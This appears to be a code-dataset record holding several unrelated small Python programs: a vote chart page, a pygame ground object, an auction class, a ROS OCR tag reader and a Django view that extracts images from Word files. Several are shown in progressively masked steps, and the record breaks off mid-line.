"step-2": "<mask token>\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\n<mask token>\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\n<mask token>\n\n\ndef main():\n run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\n<mask token>\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\napplication = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)\n\n\ndef main():\n run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import cgi\nimport os\nimport math\nimport sys\nfrom datetime import datetime\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom pygooglechart import PieChart3D\nfrom LPData import Totals\nfrom LPData import T_Shirts\nimport render\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\napplication = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)\n\n\ndef main():\n run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import cgi\nimport os\nimport math\nimport sys\nfrom datetime import datetime\n\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom pygooglechart import PieChart3D\n\nfrom LPData import Totals\nfrom LPData import T_Shirts\nimport render\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key= lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n \n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n \n if len(votes) == 0:\n return ''\n \n \n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n \nclass GraphPage(webapp.RequestHandler):\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart' : stacked_vertical()})\n render.footer(self)\n\napplication = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)\n\ndef main():\n run_wsgi_app(application)\n \nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import pygame
from pygame import Rect, Color
from pymunk import Body, Poly
from config import WIDTH, HEIGHT
class Ground:
def __init__ (self, space):
# size
self.w = WIDTH - 20
self.h = 25
# position
self.x = 10
self.y = HEIGHT - self.h
# pygame rectangle
self.rect = Rect (self.x, self.y, self.w, self.h)
self.color = Color (100, 6, 107)
# physics
self.rigidbody = Body (body_type=Body.STATIC)
self.rigidbody.position = self.x + self.w / 2, self.y
self.hitbox = Poly.create_box (self.rigidbody, (self.w, self.h))
self.hitbox.elasticity = 0
self.hitbox.mass = 1
self.hitbox.friction = 0
space.add (self.rigidbody, self.hitbox)
def update (self, dt):
return
def draw (self, window):
pygame.draw.rect (window, self.color, self.rect)
return
|
normal
|
{
"blob_id": "32fc0db68c32c2e644f9c1c2318fbeff41a0543d",
"index": 5703,
"step-1": "<mask token>\n\n\nclass Ground:\n <mask token>\n <mask token>\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-2": "<mask token>\n\n\nclass Ground:\n\n def __init__(self, space):\n self.w = WIDTH - 20\n self.h = 25\n self.x = 10\n self.y = HEIGHT - self.h\n self.rect = Rect(self.x, self.y, self.w, self.h)\n self.color = Color(100, 6, 107)\n self.rigidbody = Body(body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n self.hitbox = Poly.create_box(self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n space.add(self.rigidbody, self.hitbox)\n <mask token>\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-3": "<mask token>\n\n\nclass Ground:\n\n def __init__(self, space):\n self.w = WIDTH - 20\n self.h = 25\n self.x = 10\n self.y = HEIGHT - self.h\n self.rect = Rect(self.x, self.y, self.w, self.h)\n self.color = Color(100, 6, 107)\n self.rigidbody = Body(body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n self.hitbox = Poly.create_box(self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n space.add(self.rigidbody, self.hitbox)\n\n def update(self, dt):\n return\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-4": "import pygame\nfrom pygame import Rect, Color\nfrom pymunk import Body, Poly\nfrom config import WIDTH, HEIGHT\n\n\nclass Ground:\n\n def __init__(self, space):\n self.w = WIDTH - 20\n self.h = 25\n self.x = 10\n self.y = HEIGHT - self.h\n self.rect = Rect(self.x, self.y, self.w, self.h)\n self.color = Color(100, 6, 107)\n self.rigidbody = Body(body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n self.hitbox = Poly.create_box(self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n space.add(self.rigidbody, self.hitbox)\n\n def update(self, dt):\n return\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-5": "import pygame\nfrom pygame import Rect, Color\n\nfrom pymunk import Body, Poly\n\nfrom config import WIDTH, HEIGHT\n\nclass Ground:\n\n def __init__ (self, space):\n \n # size\n self.w = WIDTH - 20\n self.h = 25\n\n # position\n self.x = 10\n self.y = HEIGHT - self.h\n\n # pygame rectangle\n self.rect = Rect (self.x, self.y, self.w, self.h)\n self.color = Color (100, 6, 107)\n\n # physics\n self.rigidbody = Body (body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n\n self.hitbox = Poly.create_box (self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n\n space.add (self.rigidbody, self.hitbox)\n\n\n def update (self, dt):\n return\n\n\n\n def draw (self, window):\n \n pygame.draw.rect (window, self.color, self.rect)\n\n return",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from auction_type import AuctionType
from bid import Bid
class Auction(object):
def __init__(self, name, type, status, start_price, buy_now_price):
self.name = name
self.type = type
self.status = status
if AuctionType.BID == type:
self.start_price = start_price
self.bids = []
if AuctionType.BUY_NOW == type:
self.buy_now_price = buy_now_price
def add_bid(self, price):
self.bids.append(Bid(price))
|
normal
|
{
"blob_id": "9e05f883d80d7583c9f7e16b2fb5d3f67896388d",
"index": 5629,
"step-1": "<mask token>\n\n\nclass Auction(object):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Auction(object):\n\n def __init__(self, name, type, status, start_price, buy_now_price):\n self.name = name\n self.type = type\n self.status = status\n if AuctionType.BID == type:\n self.start_price = start_price\n self.bids = []\n if AuctionType.BUY_NOW == type:\n self.buy_now_price = buy_now_price\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Auction(object):\n\n def __init__(self, name, type, status, start_price, buy_now_price):\n self.name = name\n self.type = type\n self.status = status\n if AuctionType.BID == type:\n self.start_price = start_price\n self.bids = []\n if AuctionType.BUY_NOW == type:\n self.buy_now_price = buy_now_price\n\n def add_bid(self, price):\n self.bids.append(Bid(price))\n",
"step-4": "from auction_type import AuctionType\nfrom bid import Bid\n\n\nclass Auction(object):\n\n def __init__(self, name, type, status, start_price, buy_now_price):\n self.name = name\n self.type = type\n self.status = status\n if AuctionType.BID == type:\n self.start_price = start_price\n self.bids = []\n if AuctionType.BUY_NOW == type:\n self.buy_now_price = buy_now_price\n\n def add_bid(self, price):\n self.bids.append(Bid(price))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def splitListToParts(self, root, k):
"""
:type root: ListNode
:type k: int
:rtype: List[ListNode]
"""
if not root:
return [None]*k
res,p,q,n = [None]*k,root,root,0
while p:
p,n = p.next,n+1
per_len,per = 1 if n/k==0 else n/k,1
extra_count,index = 0 if n<=k else n%k,0
#print "per_len-->"+str(per_len)+" extra_count-->"+str(extra_count)
per_link_start = q
while q:
if per==per_len:
tmp = q.next
if extra_count:
p,tmp.next = tmp.next,None
tmp,extra_count = p,extra_count-1
else:
q.next = None
res[index],q,index = per_link_start,tmp,index+1
per_link_start = tmp
per = 1
continue
q,per = q.next,per+1
#print "cur PER -->"+str(per)
return res
|
normal
|
{
"blob_id": "6a609c91122f8b66f57279cff221ee76e7fadb8c",
"index": 7059,
"step-1": "# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n\tdef splitListToParts(self, root, k):\n\t\t\"\"\"\n\t\t:type root: ListNode\n\t\t:type k: int\n\t\t:rtype: List[ListNode]\n\t\t\"\"\"\n\t\tif not root:\n\t\t\treturn [None]*k\n\t\tres,p,q,n = [None]*k,root,root,0\n\t\twhile p:\n\t\t\tp,n = p.next,n+1\n\t\tper_len,per = 1 if n/k==0 else n/k,1\n\t\textra_count,index = 0 if n<=k else n%k,0\t\n\t\t\n\t\t#print \"per_len-->\"+str(per_len)+\" extra_count-->\"+str(extra_count)\n\t\tper_link_start = q\n\t\twhile q:\n\t\t\tif per==per_len:\n\t\t\t\ttmp = q.next\n\t\t\t\tif extra_count:\n\t\t\t\t\tp,tmp.next = tmp.next,None\n\t\t\t\t\ttmp,extra_count = p,extra_count-1\n\t\t\t\telse:\n\t\t\t\t\tq.next = None\n\t\t\t\tres[index],q,index = per_link_start,tmp,index+1\n\t\t\t\tper_link_start = tmp\n\t\t\t\tper = 1\n\t\t\t\tcontinue\n\t\t\tq,per = q.next,per+1\n\t\t\t#print \"cur PER -->\"+str(per)\n\t\treturn res",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
import rospy
import numpy as np
from sensor_msgs.msg import Image
import cv2, cv_bridge
from geometry_msgs.msg import Twist, Pose2D
from std_msgs.msg import String
import pytesseract as ocr
from PIL import Image as imagePil
import os
import time
from roseli.srv import CreateMap, CreateMapRequest
from roseli.srv import TagImage, TagImageResponse
from roseli.srv import ResetEnc, ResetEncRequest
from dynamic_reconfigure.server import Server
from roseli.cfg import ocr_tagConfig
class ReadTag:
def __init__(self):
self.bridge = cv_bridge.CvBridge()
self.twist=Twist()
self.image_server = rospy.Service('/cropTag', TagImage, self.image_callback) #/cropTag
self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
self.range_param = Server(ocr_tagConfig, self.reconfigure)
self.string = String()
self._pose2d_ = Pose2D()
self.rate = rospy.Rate(1)
def reconfigure(self, config, level):
#print(config)
self.min_h = config.min_hue_ocr
self.min_s = config.min_saturation_ocr
self.min_v = config.min_value_ocr
self.max_h = config.max_hue_ocr
self.max_s = config.max_saturation_ocr
self.max_v = config.max_value_ocr
return config
def creating_map_client(self, pose2d, ip):
rospy.wait_for_service('/pose2D')
try:
create_map = rospy.ServiceProxy('/pose2D', CreateMap)
resp = CreateMapRequest(pose2d, ip)
return create_map(resp)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def reset_enc_func(self):
rospy.wait_for_service('/reset_enc_server')
try:
reset = rospy.ServiceProxy('/reset_enc_server', ResetEnc)
resp = ResetEncRequest()
return reset(resp)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def image_callback (self, msg):
self.twist.linear.x = 0
self.twist.angular.z = 0
self.cmd_vel_pub.publish(self.twist)
self.rate.sleep()
try:
img = self.bridge.imgmsg_to_cv2(msg.tag, "bgr8")
except cv_bridge.CvBridgeError as e:
print ("Error: Imagem da Tag nao recebida")
print(e)
lowerBound1=np.array([self.min_h, self.min_s, self.min_v]) #lower boundary of the HSV image
upperBound1=np.array([self.max_h, self.max_s, self.max_v]) #Upper boundary of the HSV image
img_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
imgThresholder=cv2.inRange(img_HSV,lowerBound1,upperBound1,1)
cv2.imshow('picamera', img)
cv2.waitKey(500)
kernel = np.ones((3, 3), np.uint8)
imgFilter=cv2.morphologyEx(imgThresholder, cv2.MORPH_DILATE, kernel)
#imgFilter=cv2.adaptiveThreshold(imgThresholder, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 1)
cv2.imshow('window_tag', imgFilter)
cv2.waitKey(500)
#cv2.destroyAllWindows()
#cv2.waitKey(1000)
filename = "{}.png".format(os.getpid())
cv2.imwrite(filename, imgFilter)
text = ocr.image_to_string(imagePil.open(filename),config="-c tessedit_char_whitelist=1234567890.")
os.remove(filename)
print(text)
separated= text.split(' ')
if (not len(separated) == 3):
print("It doesn't read a tag!")
return TagImageResponse()
else:
self._pose2d_.x = float(separated[0])
self._pose2d_.y = float(separated[1])
self._pose2d_.theta = float(separated[2])
_resp_ = self.creating_map_client(self._pose2d_, 0)
flag = self.reset_enc_func()
self.twist.linear.x = 0.3
self.twist.angular.z = 0
for x in range(0, 10):
self.cmd_vel_pub.publish(self.twist)
time.sleep(0.5)
return TagImageResponse()
if __name__=='__main__':
try:
rospy.init_node('readtag')
readtag = ReadTag()
rospy.spin()
except rospy.ROSInterruptException:
pass
|
normal
|
{
"blob_id": "83ce5ee4d2a18caeb364b74c3739015fc0e1474c",
"index": 1344,
"step-1": "#!/usr/bin/env python\n\nimport rospy\nimport numpy as np\nfrom sensor_msgs.msg import Image\nimport cv2, cv_bridge\nfrom geometry_msgs.msg import Twist, Pose2D\nfrom std_msgs.msg import String\nimport pytesseract as ocr\nfrom PIL import Image as imagePil\nimport os\nimport time\nfrom roseli.srv import CreateMap, CreateMapRequest\nfrom roseli.srv import TagImage, TagImageResponse\nfrom roseli.srv import ResetEnc, ResetEncRequest\nfrom dynamic_reconfigure.server import Server\nfrom roseli.cfg import ocr_tagConfig\n\nclass ReadTag:\n\n\tdef __init__(self):\n\t\tself.bridge = cv_bridge.CvBridge()\n\t\tself.twist=Twist()\n\t\tself.image_server = rospy.Service('/cropTag', TagImage, self.image_callback) #/cropTag\n\t\tself.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)\n\t\tself.range_param = Server(ocr_tagConfig, self.reconfigure)\n\t\tself.string = String()\n\t\tself._pose2d_ = Pose2D()\n\t\tself.rate = rospy.Rate(1)\n\n\tdef reconfigure(self, config, level):\n\t\t#print(config)\n\t\tself.min_h = config.min_hue_ocr\n\t\tself.min_s = config.min_saturation_ocr\n\t\tself.min_v = config.min_value_ocr\n\t\tself.max_h = config.max_hue_ocr\n\t\tself.max_s = config.max_saturation_ocr\n\t\tself.max_v = config.max_value_ocr\n\t\treturn config\n\n\tdef creating_map_client(self, pose2d, ip):\n\n\t\trospy.wait_for_service('/pose2D')\n\n\t\ttry:\n\t\t\tcreate_map = rospy.ServiceProxy('/pose2D', CreateMap)\n\t\t\tresp = CreateMapRequest(pose2d, ip)\n\t\t\treturn create_map(resp)\n\t\texcept rospy.ServiceException, e:\n\t\t\tprint \"Service call failed: %s\"%e\n\n\tdef reset_enc_func(self):\n\n rospy.wait_for_service('/reset_enc_server')\n\n try:\n reset = rospy.ServiceProxy('/reset_enc_server', ResetEnc)\n resp = ResetEncRequest()\n return reset(resp)\n except rospy.ServiceException, e:\n print \"Service call failed: %s\"%e\n\n\tdef image_callback (self, msg):\n\t\tself.twist.linear.x = 0\n self.twist.angular.z = 0\n self.cmd_vel_pub.publish(self.twist)\n\t\tself.rate.sleep()\n\t\ttry:\n\t\t\timg = self.bridge.imgmsg_to_cv2(msg.tag, \"bgr8\")\n\t\texcept cv_bridge.CvBridgeError as e:\n\t\t\tprint (\"Error: Imagem da Tag nao recebida\")\n\t\t\tprint(e)\n\n\t\tlowerBound1=np.array([self.min_h, self.min_s, self.min_v]) #lower boundary of the HSV image\n\t\tupperBound1=np.array([self.max_h, self.max_s, self.max_v]) #Upper boundary of the HSV image\n\t\timg_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\t\timgThresholder=cv2.inRange(img_HSV,lowerBound1,upperBound1,1)\n\n\t\tcv2.imshow('picamera', img)\n\t\tcv2.waitKey(500)\n\t\tkernel = np.ones((3, 3), np.uint8)\n\t\timgFilter=cv2.morphologyEx(imgThresholder, cv2.MORPH_DILATE, kernel)\n\t\t#imgFilter=cv2.adaptiveThreshold(imgThresholder, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 1)\n\t\tcv2.imshow('window_tag', imgFilter)\n\t\tcv2.waitKey(500)\n\t\t#cv2.destroyAllWindows()\n\t\t#cv2.waitKey(1000)\n\t\tfilename = \"{}.png\".format(os.getpid())\n\t\tcv2.imwrite(filename, imgFilter)\n\t\ttext = ocr.image_to_string(imagePil.open(filename),config=\"-c tessedit_char_whitelist=1234567890.\")\n\t\tos.remove(filename)\n\t\tprint(text)\n\t\tseparated= text.split(' ')\n\n\t\tif (not len(separated) == 3):\n\t\t\tprint(\"It doesn't read a tag!\")\n\t\t\treturn TagImageResponse()\n\t\telse:\n\t\t\tself._pose2d_.x = float(separated[0])\n\t\t\tself._pose2d_.y = float(separated[1])\n\t\t\tself._pose2d_.theta = float(separated[2])\n\n\t\t\t_resp_ = self.creating_map_client(self._pose2d_, 0)\n\t\t\tflag = self.reset_enc_func()\n\n\t\t\tself.twist.linear.x = 0.3\n\t\t\tself.twist.angular.z = 0\n\t\t\tfor x in range(0, 10):\n\t\t\t\tself.cmd_vel_pub.publish(self.twist)\n\t\t\t\ttime.sleep(0.5)\n\t\treturn TagImageResponse()\n\nif __name__=='__main__':\n\ttry:\n\t\trospy.init_node('readtag')\n\t\treadtag = ReadTag()\n\t\trospy.spin()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import datetime
from django.shortcuts import render
from lims.models import *
import os
import zipfile
def getpicture(word):
if word.split(".")[1] not in ["doc","docx"]:
return None
word_zip = word.split(".")[0] + ".zip"
path = ""
for i in word.split("/")[0:-1]:
path += i
path += "/"
path += "tem/"
if not os.path.exists(path):
os.rename(word,word_zip)
f = zipfile.ZipFile(word_zip,"r")
for file in f.filelist:
f.extract(file,path)
f.close()
os.rename(word_zip,word)
pic = os.listdir(os.path.join(path,"word/media"))
result = []
result_ = []
for i in pic:
result.append(os.path.join(path,"word/media/") + i)
for j in result:
url = "/media/" + j.split("/media/")[1] + "/media/" + j.split("/media/")[2]
result_.append(url)
return result_
else:
pic = os.listdir(os.path.join(path, "word/media"))
result = []
result_ = []
for i in pic:
result.append(os.path.join(path, "word/media/") + i)
for j in result:
url = "/media/" + j.split("/media/")[1] + "/media/" +j.split("/media/")[2]
result_.append(url)
return result_
def getData(request):
index = request.GET.get("index")
msg = "未查找到数据"
if ExtExecute.objects.filter(query_code=index):
ext = ExtExecute.objects.filter(query_code=index).first()
result = getpicture(ext.upload_file.path)
if result:
for i in result:
i = request.META.get("HTTP_HOST") + i
subject = ext.extSubmit.subProject
dataset = ext.sampleinfoext_set.all()
type = 1
elif LibExecute.objects.filter(query_code=index):
result = getpicture(LibExecute.objects.filter(query_code=index).first().upload_file.path)
if result:
for i in result:
i = request.META.get("HTTP_HOST") + i
subject = LibExecute.objects.filter(query_code=index).first().libSubmit.subProject
dataset = LibExecute.objects.filter(query_code=index).first().sampleinfolib_set.all()
type = 2
elif SeqExecute.objects.filter(query_code=index):
subject = SeqExecute.objects.filter(query_code=index).first().seqSubmit.subProject
dataset = SeqExecute.objects.filter(query_code=index).first().sampleinfoseq_set.all()
type = 3
return render(request, "Showdata.html", {"data": dataset, "type": type, "subject": subject})
else:
return render(request,"Showdata.html",{"error":msg})
return render(request,"Showdata.html",{"data":dataset,"type":type,"subject":subject,"pic":result})
|
normal
|
{
"blob_id": "e32c73abdcd384ee7c369182527cca6495f067b3",
"index": 1977,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef getData(request):\n index = request.GET.get('index')\n msg = '未查找到数据'\n if ExtExecute.objects.filter(query_code=index):\n ext = ExtExecute.objects.filter(query_code=index).first()\n result = getpicture(ext.upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = ext.extSubmit.subProject\n dataset = ext.sampleinfoext_set.all()\n type = 1\n elif LibExecute.objects.filter(query_code=index):\n result = getpicture(LibExecute.objects.filter(query_code=index).\n first().upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = LibExecute.objects.filter(query_code=index).first(\n ).libSubmit.subProject\n dataset = LibExecute.objects.filter(query_code=index).first(\n ).sampleinfolib_set.all()\n type = 2\n elif SeqExecute.objects.filter(query_code=index):\n subject = SeqExecute.objects.filter(query_code=index).first(\n ).seqSubmit.subProject\n dataset = SeqExecute.objects.filter(query_code=index).first(\n ).sampleinfoseq_set.all()\n type = 3\n return render(request, 'Showdata.html', {'data': dataset, 'type':\n type, 'subject': subject})\n else:\n return render(request, 'Showdata.html', {'error': msg})\n return render(request, 'Showdata.html', {'data': dataset, 'type': type,\n 'subject': subject, 'pic': result})\n",
"step-3": "<mask token>\n\n\ndef getpicture(word):\n if word.split('.')[1] not in ['doc', 'docx']:\n return None\n word_zip = word.split('.')[0] + '.zip'\n path = ''\n for i in word.split('/')[0:-1]:\n path += i\n path += '/'\n path += 'tem/'\n if not os.path.exists(path):\n os.rename(word, word_zip)\n f = zipfile.ZipFile(word_zip, 'r')\n for file in f.filelist:\n f.extract(file, path)\n f.close()\n os.rename(word_zip, word)\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n else:\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n\n\ndef getData(request):\n index = request.GET.get('index')\n msg = '未查找到数据'\n if ExtExecute.objects.filter(query_code=index):\n ext = ExtExecute.objects.filter(query_code=index).first()\n result = getpicture(ext.upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = ext.extSubmit.subProject\n dataset = ext.sampleinfoext_set.all()\n type = 1\n elif LibExecute.objects.filter(query_code=index):\n result = getpicture(LibExecute.objects.filter(query_code=index).\n first().upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = LibExecute.objects.filter(query_code=index).first(\n ).libSubmit.subProject\n dataset = LibExecute.objects.filter(query_code=index).first(\n ).sampleinfolib_set.all()\n type = 2\n elif SeqExecute.objects.filter(query_code=index):\n subject = SeqExecute.objects.filter(query_code=index).first(\n ).seqSubmit.subProject\n dataset = SeqExecute.objects.filter(query_code=index).first(\n ).sampleinfoseq_set.all()\n type = 3\n return render(request, 'Showdata.html', {'data': dataset, 'type':\n type, 'subject': subject})\n else:\n return render(request, 'Showdata.html', {'error': msg})\n return render(request, 'Showdata.html', {'data': dataset, 'type': type,\n 'subject': subject, 'pic': result})\n",
"step-4": "import datetime\nfrom django.shortcuts import render\nfrom lims.models import *\nimport os\nimport zipfile\n\n\ndef getpicture(word):\n if word.split('.')[1] not in ['doc', 'docx']:\n return None\n word_zip = word.split('.')[0] + '.zip'\n path = ''\n for i in word.split('/')[0:-1]:\n path += i\n path += '/'\n path += 'tem/'\n if not os.path.exists(path):\n os.rename(word, word_zip)\n f = zipfile.ZipFile(word_zip, 'r')\n for file in f.filelist:\n f.extract(file, path)\n f.close()\n os.rename(word_zip, word)\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n else:\n pic = os.listdir(os.path.join(path, 'word/media'))\n result = []\n result_ = []\n for i in pic:\n result.append(os.path.join(path, 'word/media/') + i)\n for j in result:\n url = '/media/' + j.split('/media/')[1] + '/media/' + j.split(\n '/media/')[2]\n result_.append(url)\n return result_\n\n\ndef getData(request):\n index = request.GET.get('index')\n msg = '未查找到数据'\n if ExtExecute.objects.filter(query_code=index):\n ext = ExtExecute.objects.filter(query_code=index).first()\n result = getpicture(ext.upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = ext.extSubmit.subProject\n dataset = ext.sampleinfoext_set.all()\n type = 1\n elif LibExecute.objects.filter(query_code=index):\n result = getpicture(LibExecute.objects.filter(query_code=index).\n first().upload_file.path)\n if result:\n for i in result:\n i = request.META.get('HTTP_HOST') + i\n subject = LibExecute.objects.filter(query_code=index).first(\n ).libSubmit.subProject\n dataset = LibExecute.objects.filter(query_code=index).first(\n ).sampleinfolib_set.all()\n type = 2\n elif SeqExecute.objects.filter(query_code=index):\n subject = SeqExecute.objects.filter(query_code=index).first(\n ).seqSubmit.subProject\n dataset = SeqExecute.objects.filter(query_code=index).first(\n ).sampleinfoseq_set.all()\n type = 3\n return render(request, 'Showdata.html', {'data': dataset, 'type':\n type, 'subject': subject})\n else:\n return render(request, 'Showdata.html', {'error': msg})\n return render(request, 'Showdata.html', {'data': dataset, 'type': type,\n 'subject': subject, 'pic': result})\n",
"step-5": "import datetime\r\n\r\nfrom django.shortcuts import render\r\nfrom lims.models import *\r\nimport os\r\nimport zipfile\r\n\r\ndef getpicture(word):\r\n if word.split(\".\")[1] not in [\"doc\",\"docx\"]:\r\n return None\r\n word_zip = word.split(\".\")[0] + \".zip\"\r\n path = \"\"\r\n for i in word.split(\"/\")[0:-1]:\r\n path += i\r\n path += \"/\"\r\n path += \"tem/\"\r\n if not os.path.exists(path):\r\n os.rename(word,word_zip)\r\n f = zipfile.ZipFile(word_zip,\"r\")\r\n for file in f.filelist:\r\n f.extract(file,path)\r\n f.close()\r\n os.rename(word_zip,word)\r\n pic = os.listdir(os.path.join(path,\"word/media\"))\r\n result = []\r\n result_ = []\r\n for i in pic:\r\n result.append(os.path.join(path,\"word/media/\") + i)\r\n for j in result:\r\n url = \"/media/\" + j.split(\"/media/\")[1] + \"/media/\" + j.split(\"/media/\")[2]\r\n result_.append(url)\r\n return result_\r\n else:\r\n pic = os.listdir(os.path.join(path, \"word/media\"))\r\n result = []\r\n result_ = []\r\n for i in pic:\r\n result.append(os.path.join(path, \"word/media/\") + i)\r\n for j in result:\r\n url = \"/media/\" + j.split(\"/media/\")[1] + \"/media/\" +j.split(\"/media/\")[2]\r\n result_.append(url)\r\n return result_\r\n\r\n\r\ndef getData(request):\r\n index = request.GET.get(\"index\")\r\n msg = \"未查找到数据\"\r\n if ExtExecute.objects.filter(query_code=index):\r\n ext = ExtExecute.objects.filter(query_code=index).first()\r\n result = getpicture(ext.upload_file.path)\r\n if result:\r\n for i in result:\r\n i = request.META.get(\"HTTP_HOST\") + i\r\n subject = ext.extSubmit.subProject\r\n dataset = ext.sampleinfoext_set.all()\r\n type = 1\r\n elif 